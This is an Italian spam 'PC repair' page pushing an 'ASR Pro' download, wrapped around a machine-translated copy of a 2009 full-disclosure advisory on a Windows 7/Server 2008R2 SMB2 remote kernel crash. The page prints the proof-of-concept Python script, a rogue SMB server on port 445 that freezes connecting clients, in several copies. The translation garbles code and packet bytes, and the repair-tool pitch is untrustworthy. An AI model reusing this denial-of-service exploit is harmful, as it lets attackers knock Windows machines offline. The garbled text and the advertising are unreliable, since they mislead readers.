Table of Contents

 

Approvato

  • 1. Scarica ASR Pro
  • 2. Apri il programma e seleziona "Scansiona il tuo computer"
  • 3. Fai clic su "Ripara" per avviare il processo di riparazione
  • Il software per riparare il tuo PC è a portata di clic: scaricalo ora.

    Se Windows 7th / Server 2008r2 Remote Kernel si blocca sul tuo computer, chiunque di noi spera che questa guida per l’utente possa essere di aiuto per risolvere il problema. G.Ciclo infinito del client SMB di Microsoft Windows 7 / Server 2008 R2: impedisce l’esecuzione di operazioni nel client SMB di Microsoft Windows su Windows 7 e Windows Server 2010 R2. Per lo più fallisce il kernel silenzioso. Il Metasploit Framework contiene un modulo particolare per sfruttare la mia vulnerabilità.

     

     

    G.

      #! / usr e bin / python# win7-crash.Trigger py:# crash del kernel rurale sul server host Win7 e 2008R2 (ciclo infinito)# KeAccumulateTicks () si blocca a causa di NT_ASSERT () - DbgRaiseAssertionFailure () causato da potenti# Ciclo infinito.# NO BSOD, DEVI SCOLLEGARE IL CONNETTORE.# Per chiamare rapidamente l'elemento; in ordine:  this_script_ip_addr  BLAH, crasha senza sforzo# Autore: Laurent Gaffi¯ ¿ ½Importa server socketPacchetto = (" x00  x00  x00  x9a" dimensione del numero ---> deve essere 9th, senza dubbio 9a .." xfe  x53  x4d  x42  x40  x00  x00  x00  x00  x00  x00  x00  x00  x00  x01  x00"" x01  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00""A0???#A"" xaa  x4b  xad  x99  xfd  x52  x31  x8d  x01  x00  x00  x00  x00  x00  x01  x00"" x00  x00  x01  x00  x00  x00  x01  x00  xcf  x73  x67  x74  x62 x60  xca  x01 ""?Q?b`?? LM ""`+?0sony ericsson xperia x10?"" x30  x0c  x06  x0a  x2b  x06  x01  x04  x01  x82  x37  x02  x02  x0a")Classe SMB2 (SocketServer.BaseRequestHandler):  Def-Handle (lei stessa):        print "Chi:", self.client_address        Usa "GRAZIE SDL"       I metodi di immissione self.request.recv (1024)        self.request.send (pacchetto)        self.request.close ()launch = SocketServer.TCPServer (('', 445), SMB2) # ascolta su tutte le interfacce centro 445launch.serve_forever ()             

    Questo errore è una prova importante che SDL FAIL
    L’obiettivo di un errore è un ciclo infinito sull’argomento di smb1,2, pre-autenticazione, solo nessuna credenziale appropriata…
    Può essere lanciato sulla televisione locale tramite (IE *)
    L’errore sarà probabilmente così semplice che molti avrebbero dovuto essere scoperti anni fa da un SDL specifico se l’SDL esisteva già:

    netbios_header è uguale a struct.pack (“> i”, len (”. work with (SMB_packet)) + SMB_packet
    (I tag netbios h2 indicano la lunghezza relativa al nuovo pacchetto smb1,2.)

    Se il particolare numero netbios_header è 4 byte molto meno o più di SMB_packet, la questione è semplicemente violata!
    CHE TIPO ?? Stai scherzando dov’è anche il mio SDL?!?

    arresto anomalo del kernel remoto del server Windows 7 2008r2

    “Il sistema operativo ideale sulla luce. е “;
    Che il tuo firewall corretto sia sempre stato configurato dovrebbe essere rimosso tramite IE, anche con l’operazione di trasmissione nbns (nessuna interazione dell’utente)

    ================================================
    – Data di uscita: 11 novembre 2009
    – Scoperta da: Laurent Gaffier
    – Gravità: media/alta
    ==============================================

    windows 7/server 2008r2 ha individuato un arresto anomalo del kernel

    NS. CONFERMA DEL CONCETTO
    ————————–
    # win7-crash.py:
    # Esecuzione di un nuovo vero crash del kernel remoto in Win7 e quindi Server 2008R2 (loop infinito)
    # KeAccumulateTicks () si è bloccato a causa di NT_ASSERT () / DbgRaiseAssertionFailure () a cui ha contribuito # un ciclo infinito forte.
    # NESSUN BSOD, HAI UN SUGHERO.
    # Per chiamarlo rapidamente; nell’ordine: this_script_ip_addr BLAH, elimina immediatamente
    # Inserito da Laurent Gaffier
    #

    Pacchetto = (numero ” x00 x00 x00 x9a” —> la 9a lunghezza dovrebbe esistere realmente 9a ..
    ” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″
    ” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
    ” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
    ” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
    ” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″
    ” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00 “
    ” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″
    “?Q?b`?? LM ”
    ” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 x10 xa0 x0e”
    ” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”)

    V. IMPATTO COMMERCIALE
    ————————–
    Un utente malintenzionato dovrebbe disabilitare in remoto qualsiasi computer Windows 2008R2 7 /
    in locale interact o tramite IE

    Vii. Mix di patch
    ————————–
    non è disponibile per un’istanza del genere, al tuo ISP non interessa.
    Chiudere la funzione e le porte SMB fino a quando non viene fornito un controllo autentico.

    X. STORIA DEI CAMBIAMENTI
    ————————–
    8 novembre 2009: MSRC ha contattato
    8 novembre 2009: MSRC ha scoperto una vulnerabilità
    11 novembre 2009: MRSC potrebbe essere descritto come un tentativo di convincermi perché c’è un bug IPv6 da una serie di fornitori che non dovrebbe apparire dai bollettini di sicurezza.
    11 novembre 2009: questo prezioso bug è stato rilasciato.

    XI. NOTE
    ————————–
    Le informazioni legali contenute in questo avviso vengono utilizzate “così come sono”
    senza dichiarazioni o garanzie di opportunità o altro.
    Non ricevo alcun danno causato dall’azienda o da
    Uso improprio di queste informazioni.

    Divulgazione completaArchivi di mailing list

    Errore del kernel remoto Windows 7 Server 2008R2Da: laurent gaffie
    Data: gmail mercoledì 11 novembre 2009 05:58:44 room ) 05:00
    =============================================- DATA di emissione: 11 novembre 2009- Appena scoperto: Laurent Gaffier- Gravità: Medio/Alto.================================================I. VULNERABILITÀ————Blocco kernel remoto Windows 1, * Server 2008R2II. CONTESTO————# FALLITO, # FALLITO, # FALLITOSDL FAIL, “Il sistema operativo più sicuro di sempre” -> Kernel remoto in pochi minuti.# FALLITO, # FALLITO, # FALLITOIII. DESCRIZIONE————Vedi: http://g-laurent.blogspot.com/ per maggiori informazioni e molti dettagli.# Commento: questo bug è stato scoperto come Windows 7/2008R2.NS. EVIDENZE CONCETTUALI————# win7-crash.py:# Esecuzione di un altro arresto anomalo del kernel online in Win7 in aggiunta al server 2008R2 (ciclo infinito)# KeAccumulateTicks () si blocca a causa di NT_ASSERT () per ogni DbgRaiseAssertionFailure ()evocando un ciclo infinito.# NO BSOD, SCOLLEGATE IL CONNETTORE.# Per un avvio rapido dal target: this_script_ip_addr BLAH, immediatamenteincidente#Autore: Laurent Gaffier#Importa server socketPackage = ” x00 x00 x00 x9a” # —> probabile 9°, non 9a.” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″”A0???#A”” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00″” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″”?Q?b`?? LM “” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 x10 xa0 x0e”” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”Classe SMB2 (SocketServer.BaseRequestHandler): def gestire (auto): “Chi:” Immagine, self.client_address Il blog implica self.request.recv (1024) self.request.send (pacchetto) self.request.close ()Start significa SocketServer.TCPServer ((”, 445), SMB2) # in ascolto su tutte le porte445eseguire interface.serve_forever ()#SDL FALLITOV. BUSINESS Attacco dell’aggressore————e può arrestare e masterizzare in remoto qualsiasi Windows 7 / Server 2008R2.VI… SISTEMI PRENOTATI————Windows 7, Windows 2008R2VII computer internet. SOLUZIONE————Non c’è nessuna patch in questo momento, il venditore se ne frega di questo.Chiudi la merce e le porte SMB fino a quando non viene eseguita un’analisi reale.VIII. RIFERIMENTI————http://blogs.msdn.com/sdl/http://g-laurent.blogspot.com/http://twitter.com/g_laurentIX. prestiti————Questa vulnerabilità sembrava essere implementata da Laurent Gaffier. scopertoLaurent.gaffieremove-this (at) gmail.comX. STORIA DELLE REVISIONI————8 novembre ’09: contattato MSRC.9 novembre 2009: MSRC sembra aver identificato una vulnerabilità.11 novembre 2009: MRSC sta cercando di convincersi che un IPv6 di vari fornitori sia il nuovo bug.non dovrebbe apparire nei bollettini di affidabilità.11 novembre 2009: rilascio di Win Remote 7 Kernel SmashXI. AVVISO LEGALE————Le informazioni che fanno questo avviso sono fornite “così come sono”.senza garanzie o offerte d’uso, eventualmente in altro modo.Non sono responsabile dell’usura causata dall’uso di orabusare di queste informazioni.XII Note personali————I kernel FD @MS più remoti torneranno in un secondo momento.

     ________________________________________________GenereLa mia divulgazione di informazioni - fidati perfettamente ora.Carta: http://lists.grok.org.uk/full-disclosure-charter.htmlAppena pubblicato e sponsorizzato per gentile concessione di Secunia Http: // secunia-.com/ 

    Per data Per Filo

    Stream corrente:

    • Potente arresto anomalo del kernel remoto di Windows Server 2008R2 di Laurent Gaffy (11 novembre)

    Approvato

    Lo strumento di riparazione ASR Pro è la soluzione per un PC Windows che funziona lentamente, presenta problemi di registro o è infetto da malware. Questo strumento potente e facile da usare può diagnosticare e riparare rapidamente il tuo PC, aumentando le prestazioni, ottimizzando la memoria e migliorando la sicurezza nel processo. Non soffrire più di un computer lento: prova ASR Pro oggi!


     

     

    Il software per riparare il tuo PC è a portata di clic: scaricalo ora.